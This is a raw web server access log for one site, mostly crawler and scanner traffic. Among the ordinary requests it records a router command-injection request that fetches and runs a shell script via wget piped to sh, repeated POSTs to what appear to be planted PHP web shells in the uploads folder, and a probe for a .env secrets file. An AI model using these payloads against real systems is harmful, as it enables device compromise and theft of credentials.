172.68.231.131 - - [12/Jul/2026:15:52:37 +0200] "POST /wp-content/uploads/BDKR28_wn9gxfm5.php HTTP/1.1" 200 3285 "http://alg24info.com/wp-content/uploads/BDKR28_wn9gxfm5.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/150.0.0.0 Safari/537.36"
172.68.231.131 - - [12/Jul/2026:15:52:37 +0200] "POST /wp-content/uploads/BDKR28_wn9gxfm5.php HTTP/1.1" 200 3279 "http://alg24info.com/wp-content/uploads/BDKR28_wn9gxfm5.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/150.0.0.0 Safari/537.36"
172.68.231.131 - - [12/Jul/2026:15:52:37 +0200] "POST /wp-content/uploads/BDKR28_wn9gxfm5.php HTTP/1.1" 200 3279 "http://alg24info.com/wp-content/uploads/BDKR28_wn9gxfm5.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/150.0.0.0 Safari/537.36"
172.68.231.131 - - [12/Jul/2026:15:52:39 +0200] "POST /wp-content/uploads/BDKR28_wn9gxfm5.php HTTP/1.1" 200 6575 "http://alg24info.com/wp-content/uploads/BDKR28_wn9gxfm5.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/150.0.0.0 Safari/537.36"
104.22.56.104 - - [12/Jul/2026:15:52:46 +0200] "GET /outlet/202016305 HTTP/1.1" 404 243 "https://alg24info.com/?sitemap448.xml" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
172.68.231.131 - - [12/Jul/2026:15:52:57 +0200] "POST /wp-content/uploads/BDKR28_wn9gxfm5.php HTTP/1.1" 200 5955 "http://alg24info.com/wp-content/uploads/BDKR28_wn9gxfm5.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/150.0.0.0 Safari/537.36"
172.68.231.131 - - [12/Jul/2026:15:53:18 +0200] "POST /wp-content/uploads/BDKR28_wn9gxfm5.php HTTP/1.1" 200 5478 "http://alg24info.com/wp-content/uploads/BDKR28_wn9gxfm5.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/150.0.0.0 Safari/537.36"
104.22.56.104 - - [12/Jul/2026:15:53:19 +0200] "GET /outlet/213014942 HTTP/1.1" 404 243 "https://alg24info.com/?sitemap600.xml" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
172.68.231.131 - - [12/Jul/2026:15:53:28 +0200] "POST /wp-content/uploads/BDKR28_wn9gxfm5.php HTTP/1.1" 200 5353 "http://alg24info.com/wp-content/uploads/BDKR28_wn9gxfm5.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/150.0.0.0 Safari/537.36"
172.68.231.131 - - [12/Jul/2026:15:53:33 +0200] "POST /wp-content/uploads/BDKR28_wn9gxfm5.php HTTP/1.1" 200 4283 "http://alg24info.com/wp-content/uploads/BDKR28_wn9gxfm5.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/150.0.0.0 Safari/537.36"
172.68.231.130 - - [12/Jul/2026:15:53:37 +0200] "GET /wp-content/uploads/aaa.php HTTP/1.1" 200 3632 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/150.0.0.0 Safari/537.36"
172.68.231.192 - - [12/Jul/2026:15:53:39 +0200] "GET /favicon.ico HTTP/1.1" 404 243 "https://alg24info.com/wp-content/uploads/aaa.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/150.0.0.0 Safari/537.36"
172.68.231.130 - - [12/Jul/2026:15:53:46 +0200] "POST /wp-content/uploads/aaa.php HTTP/1.1" 200 3635 "https://alg24info.com/wp-content/uploads/aaa.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/150.0.0.0 Safari/537.36"
104.22.56.104 - - [12/Jul/2026:15:53:52 +0200] "GET /outlet/260019587 HTTP/1.1" 404 243 "https://alg24info.com/?sitemap741.xml" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
46.101.16.175 - - [12/Jul/2026:15:54:09 +0200] "\x05\x01\x00" 400 182 "-" "-"
104.22.56.104 - - [12/Jul/2026:15:54:25 +0200] "GET /outlet/016039481 HTTP/1.1" 404 243 "https://alg24info.com/?sitemap224.xml" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
104.22.56.104 - - [12/Jul/2026:15:54:58 +0200] "GET /outlet/199013758 HTTP/1.1" 404 243 "https://alg24info.com/?sitemap224.xml" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
104.22.56.104 - - [12/Jul/2026:15:55:30 +0200] "GET /outlet/073047970 HTTP/1.1" 404 243 "https://alg24info.com/?sitemap741.xml" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
104.22.56.104 - - [12/Jul/2026:15:56:05 +0200] "GET /outlet/077007246 HTTP/1.1" 404 243 "https://alg24info.com/?sitemap600.xml" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
104.22.56.104 - - [12/Jul/2026:15:56:38 +0200] "GET /outlet/218016369 HTTP/1.1" 404 243 "https://alg24info.com/?sitemap344.xml" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
104.22.56.104 - - [12/Jul/2026:15:57:12 +0200] "GET /outlet/239039672 HTTP/1.1" 404 243 "https://alg24info.com/?sitemap344.xml" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
104.22.56.104 - - [12/Jul/2026:15:57:45 +0200] "GET /outlet/055026478 HTTP/1.1" 404 243 "https://alg24info.com/?sitemap224.xml" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
221.159.119.6 - - [12/Jul/2026:15:57:52 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(wget%20http%3A//0.0.0.0/router.tplink.sh%20-O-%7Csh) HTTP/1.1" 499 0 "-" "-"
221.159.119.6 - - [12/Jul/2026:15:57:52 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(wget%20http%3A//0.0.0.0/router.tplink.sh%20-O-%7Csh) HTTP/1.1" 499 0 "-" "-"
104.22.56.104 - - [12/Jul/2026:15:58:17 +0200] "GET /outlet/122032427 HTTP/1.1" 404 243 "https://alg24info.com/?sitemap448.xml" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
104.22.56.104 - - [12/Jul/2026:15:58:51 +0200] "GET /outlet/268038807 HTTP/1.1" 404 243 "https://alg24info.com/?sitemap600.xml" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
199.45.155.90 - - [12/Jul/2026:15:58:53 +0200] "GET / HTTP/1.1" 200 1848 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
199.45.155.90 - - [12/Jul/2026:15:58:55 +0200] "PRI * HTTP/2.0" 400 182 "-" "-"
199.45.155.90 - - [12/Jul/2026:15:58:56 +0200] "GET /favicon.ico HTTP/1.1" 404 244 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
199.45.155.90 - - [12/Jul/2026:15:59:11 +0200] "GET /security.txt HTTP/1.1" 404 244 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
5.61.209.92 - - [12/Jul/2026:15:59:14 +0200] "GET /SDK/webLanguage HTTP/1.1" 404 244 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
104.22.56.104 - - [12/Jul/2026:15:59:25 +0200] "GET /outlet/137031780 HTTP/1.1" 404 243 "https://alg24info.com/?sitemap344.xml" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
172.70.240.53 - - [12/Jul/2026:15:59:52 +0200] "HEAD / HTTP/1.1" 500 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
104.22.56.104 - - [12/Jul/2026:15:59:57 +0200] "GET /outlet/147016466 HTTP/1.1" 404 243 "https://alg24info.com/?sitemap600.xml" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
104.22.56.104 - - [12/Jul/2026:16:00:32 +0200] "GET /outlet/059017574 HTTP/1.1" 404 243 "https://alg24info.com/?sitemap344.xml" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
108.162.237.69 - - [12/Jul/2026:16:00:33 +0200] "GET /robots.txt HTTP/1.1" 200 130 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36; compatible; OAI-SearchBot/1.4; robots.txt; +https://openai.com/searchbot"
104.22.56.104 - - [12/Jul/2026:16:01:05 +0200] "GET /outlet/277005908 HTTP/1.1" 404 243 "https://alg24info.com/?sitemap741.xml" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
104.22.56.104 - - [12/Jul/2026:16:01:38 +0200] "GET /outlet/005023714 HTTP/1.1" 404 243 "https://alg24info.com/?sitemap448.xml" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
104.22.56.104 - - [12/Jul/2026:16:02:11 +0200] "GET /outlet/052046725 HTTP/1.1" 404 243 "https://alg24info.com/?sitemap224.xml" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
104.22.56.104 - - [12/Jul/2026:16:02:44 +0200] "GET /outlet/294011517 HTTP/1.1" 404 243 "https://alg24info.com/?sitemap741.xml" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
104.22.56.104 - - [12/Jul/2026:16:03:18 +0200] "GET /outlet/057004498 HTTP/1.1" 404 243 "https://alg24info.com/?sitemap344.xml" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
104.22.56.104 - - [12/Jul/2026:16:03:52 +0200] "GET /outlet/225035936 HTTP/1.1" 404 243 "https://alg24info.com/?sitemap448.xml" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
104.22.56.104 - - [12/Jul/2026:16:04:25 +0200] "GET /outlet/249034220 HTTP/1.1" 404 243 "https://alg24info.com/?sitemap741.xml" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
104.22.56.104 - - [12/Jul/2026:16:05:00 +0200] "GET /outlet/289017874 HTTP/1.1" 404 243 "https://alg24info.com/?sitemap344.xml" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
104.22.56.104 - - [12/Jul/2026:16:05:32 +0200] "GET /outlet/055044024 HTTP/1.1" 404 243 "https://alg24info.com/?sitemap448.xml" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
104.22.56.104 - - [12/Jul/2026:16:06:07 +0200] "GET /outlet/191045468 HTTP/1.1" 404 243 "https://alg24info.com/?sitemap600.xml" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
104.22.56.104 - - [12/Jul/2026:16:06:42 +0200] "GET /outlet/206013183 HTTP/1.1" 404 243 "https://alg24info.com/?sitemap741.xml" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
104.22.56.104 - - [12/Jul/2026:16:07:14 +0200] "GET /outlet/139025286 HTTP/1.1" 404 243 "https://alg24info.com/?sitemap448.xml" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
104.22.56.104 - - [12/Jul/2026:16:07:48 +0200] "GET /outlet/005037852 HTTP/1.1" 404 243 "https://alg24info.com/?sitemap448.xml" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
51.89.199.115 - - [12/Jul/2026:16:08:05 +0200] "GET / HTTP/1.1" 200 1848 "-" "Go-http-client/1.1"
51.89.199.115 - - [12/Jul/2026:16:08:05 +0200] "GET / HTTP/1.1" 200 1848 "-" "Go-http-client/1.1"
104.22.56.104 - - [12/Jul/2026:16:08:23 +0200] "GET /outlet/210028739 HTTP/1.1" 404 243 "https://alg24info.com/?sitemap600.xml" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
8.216.16.2 - - [12/Jul/2026:16:08:45 +0200] "l\x00\x0B\x00\x00\x00\x00\x00\x00\x00\x00\x00" 400 182 "-" "-"
8.216.16.2 - - [12/Jul/2026:16:08:45 +0200] "GET / HTTP/1.1" 400 280 "-" "curl/7.74.0"
104.22.56.104 - - [12/Jul/2026:16:08:57 +0200] "GET /outlet/047019204 HTTP/1.1" 404 243 "https://alg24info.com/?sitemap600.xml" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
104.22.56.104 - - [12/Jul/2026:16:09:30 +0200] "GET /outlet/204033821 HTTP/1.1" 404 243 "https://alg24info.com/?sitemap448.xml" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
104.22.56.104 - - [12/Jul/2026:16:10:03 +0200] "GET /outlet/038013615 HTTP/1.1" 404 243 "https://alg24info.com/?sitemap741.xml" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
104.22.56.104 - - [12/Jul/2026:16:10:36 +0200] "GET /outlet/011021208 HTTP/1.1" 404 243 "https://alg24info.com/?sitemap600.xml" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
104.22.56.104 - - [12/Jul/2026:16:11:09 +0200] "GET /outlet/017044814 HTTP/1.1" 404 243 "https://alg24info.com/?sitemap224.xml" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
104.22.56.104 - - [12/Jul/2026:16:11:43 +0200] "GET /outlet/033026720 HTTP/1.1" 404 243 "https://alg24info.com/?sitemap741.xml" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
104.22.56.104 - - [12/Jul/2026:16:12:17 +0200] "GET /outlet/286044039 HTTP/1.1" 404 243 "https://alg24info.com/?sitemap741.xml" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
104.22.56.104 - - [12/Jul/2026:16:12:52 +0200] "GET /outlet/175041042 HTTP/1.1" 404 243 "https://alg24info.com/?sitemap344.xml" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
104.22.56.104 - - [12/Jul/2026:16:13:27 +0200] "GET /outlet/153047736 HTTP/1.1" 404 243 "https://alg24info.com/?sitemap224.xml" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
104.22.56.104 - - [12/Jul/2026:16:13:59 +0200] "GET /outlet/142004929 HTTP/1.1" 404 243 "https://alg24info.com/?sitemap741.xml" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
104.22.56.104 - - [12/Jul/2026:16:14:31 +0200] "GET /outlet/132025085 HTTP/1.1" 404 243 "https://alg24info.com/?sitemap448.xml" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
104.22.56.104 - - [12/Jul/2026:16:15:05 +0200] "GET /outlet/246007543 HTTP/1.1" 404 243 "https://alg24info.com/?sitemap448.xml" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
104.22.56.104 - - [12/Jul/2026:16:15:39 +0200] "GET /outlet/085033456 HTTP/1.1" 404 243 "https://alg24info.com/?sitemap741.xml" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
104.22.56.104 - - [12/Jul/2026:16:16:13 +0200] "GET /outlet/213025254 HTTP/1.1" 404 243 "https://alg24info.com/?sitemap600.xml" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
104.22.56.104 - - [12/Jul/2026:16:16:46 +0200] "GET /outlet/155023044 HTTP/1.1" 404 243 "https://alg24info.com/?sitemap344.xml" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
104.22.56.104 - - [12/Jul/2026:16:17:21 +0200] "GET /outlet/191009850 HTTP/1.1" 404 243 "https://alg24info.com/?sitemap600.xml" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
104.22.56.104 - - [12/Jul/2026:16:17:54 +0200] "GET /outlet/114015057 HTTP/1.1" 404 243 "https://alg24info.com/?sitemap448.xml" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
104.22.56.104 - - [12/Jul/2026:16:18:27 +0200] "GET /outlet/241017386 HTTP/1.1" 404 243 "https://alg24info.com/?sitemap600.xml" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
104.22.56.104 - - [12/Jul/2026:16:19:01 +0200] "GET /outlet/164025543 HTTP/1.1" 404 243 "https://alg24info.com/?sitemap448.xml" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
104.22.56.104 - - [12/Jul/2026:16:19:35 +0200] "GET /outlet/252026451 HTTP/1.1" 404 243 "https://alg24info.com/?sitemap448.xml" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
104.22.56.104 - - [12/Jul/2026:16:20:07 +0200] "GET /outlet/202010801 HTTP/1.1" 404 243 "https://alg24info.com/?sitemap224.xml" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
104.22.56.104 - - [12/Jul/2026:16:20:42 +0200] "GET /outlet/229004838 HTTP/1.1" 404 243 "https://alg24info.com/?sitemap224.xml" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
104.22.56.104 - - [12/Jul/2026:16:21:15 +0200] "GET /outlet/271032768 HTTP/1.1" 404 243 "https://alg24info.com/?sitemap741.xml" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
104.22.56.104 - - [12/Jul/2026:16:21:49 +0200] "GET /outlet/166006067 HTTP/1.1" 404 243 "https://alg24info.com/?sitemap344.xml" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
104.22.56.104 - - [12/Jul/2026:16:22:23 +0200] "GET /outlet/263026736 HTTP/1.1" 404 243 "https://alg24info.com/?sitemap344.xml" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
104.22.66.149 - - [12/Jul/2026:16:22:27 +0200] "GET /stest.php HTTP/1.1" 404 243 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; [email protected])"
104.22.56.104 - - [12/Jul/2026:16:22:56 +0200] "GET /outlet/054009139 HTTP/1.1" 404 243 "https://alg24info.com/?sitemap448.xml" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
104.22.56.104 - - [12/Jul/2026:16:23:30 +0200] "GET /outlet/127013748 HTTP/1.1" 404 243 "https://alg24info.com/?sitemap600.xml" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
104.22.56.104 - - [12/Jul/2026:16:24:03 +0200] "GET /outlet/130019989 HTTP/1.1" 404 243 "https://alg24info.com/?sitemap741.xml" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
104.22.56.104 - - [12/Jul/2026:16:24:37 +0200] "GET /outlet/052023807 HTTP/1.1" 404 243 "https://alg24info.com/?sitemap600.xml" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
104.22.56.104 - - [12/Jul/2026:16:25:11 +0200] "GET /outlet/259044144 HTTP/1.1" 404 243 "https://alg24info.com/?sitemap600.xml" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
104.22.56.104 - - [12/Jul/2026:16:25:44 +0200] "GET /outlet/122023421 HTTP/1.1" 404 243 "https://alg24info.com/?sitemap344.xml" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
78.153.140.93 - - [12/Jul/2026:16:26:10 +0200] "GET /.env HTTP/1.1" 404 244 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.5845.140 Safari/537.36"
78.153.140.93 - - [12/Jul/2026:16:26:10 +0200] "POST / HTTP/1.1" 200 1848 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.5845.140 Safari/537.36"
104.22.56.104 - - [12/Jul/2026:16:26:18 +0200] "GET /outlet/163046776 HTTP/1.1" 404 243 "https://alg24info.com/?sitemap741.xml" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
104.22.56.104 - - [12/Jul/2026:16:26:50 +0200] "GET /outlet/205005658 HTTP/1.1" 404 243 "https://alg24info.com/?sitemap224.xml" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
104.22.56.104 - - [12/Jul/2026:16:27:24 +0200] "GET /outlet/078003907 HTTP/1.1" 404 243 "https://alg24info.com/?sitemap741.xml" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
104.22.57.40 - - [12/Jul/2026:16:27:59 +0200] "GET /outlet/174045967 HTTP/1.1" 404 243 "https://alg24info.com/?sitemap344.xml" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
104.22.57.40 - - [12/Jul/2026:16:28:33 +0200] "GET /outlet/014007615 HTTP/1.1" 404 243 "https://alg24info.com/?sitemap448.xml" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
151.243.11.245 - - [12/Jul/2026:16:28:49 +0200] "GET / HTTP/1.1" 200 4963 "-" "Mozilla/5.0 (compatible; FlowIQLabsBot/1.0; +https://flowiq-labs.com/scanning-info)"
151.243.11.245 - - [12/Jul/2026:16:28:50 +0200] "GET /favicon.ico HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; FlowIQLabsBot/1.0; +https://flowiq-labs.com/scanning-info)"
104.22.57.40 - - [12/Jul/2026:16:29:06 +0200] "GET /outlet/205026082 HTTP/1.1" 404 243 "https://alg24info.com/?sitemap600.xml" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
104.22.57.40 - - [12/Jul/2026:16:29:38 +0200] "GET /outlet/016024791 HTTP/1.1" 404 243 "https://alg24info.com/?sitemap224.xml" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
104.22.57.40 - - [12/Jul/2026:16:30:13 +0200] "GET /outlet/108032967 HTTP/1.1" 404 243 "https://alg24info.com/?sitemap224.xml" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
104.22.57.40 - - [12/Jul/2026:16:30:47 +0200] "GET /outlet/146038051 HTTP/1.1" 404 243 "https://alg24info.com/?sitemap344.xml" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
104.22.57.40 - - [12/Jul/2026:16:31:19 +0200] "GET /outlet/219018320 HTTP/1.1" 404 243 "https://alg24info.com/?sitemap448.xml" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
104.22.57.40 - - [12/Jul/2026:16:31:52 +0200] "GET /outlet/299036416 HTTP/1.1" 404 243 "https://alg24info.com/?sitemap448.xml" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
142.93.183.252 - - [12/Jul/2026:16:32:11 +0200] "GET / HTTP/1.1" 200 1848 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/142.0.0.0 Safari/537.36"
142.93.183.252 - - [12/Jul/2026:16:32:11 +0200] "GET /favicon.ico HTTP/1.1" 404 244 "http://51.91.100.113/" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/142.0.0.0 Safari/537.36"
104.22.57.40 - - [12/Jul/2026:16:32:25 +0200] "GET /outlet/220027931 HTTP/1.1" 404 243 "https://alg24info.com/?sitemap448.xml" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
104.22.57.40 - - [12/Jul/2026:16:32:59 +0200] "GET /outlet/025006138 HTTP/1.1" 404 243 "https://alg24info.com/?sitemap448.xml" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
45.79.207.252 - - [12/Jul/2026:16:33:17 +0200] "GET / HTTP/1.1" 400 280 "-" "Mozilla/5.0 zgrab/0.x"
173.255.221.189 - - [12/Jul/2026:16:33:24 +0200] "GET / HTTP/1.1" 200 1848 "-" "Mozilla/5.0 zgrab/0.x"
104.22.57.40 - - [12/Jul/2026:16:33:34 +0200] "GET /outlet/203011508 HTTP/1.1" 404 243 "https://alg24info.com/?sitemap448.xml" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
45.33.80.243 - - [12/Jul/2026:16:33:50 +0200] "GET / HTTP/1.1" 200 1848 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 13_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
104.22.57.40 - - [12/Jul/2026:16:34:07 +0200] "GET /outlet/026016711 HTTP/1.1" 404 243 "https://alg24info.com/?sitemap224.xml" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
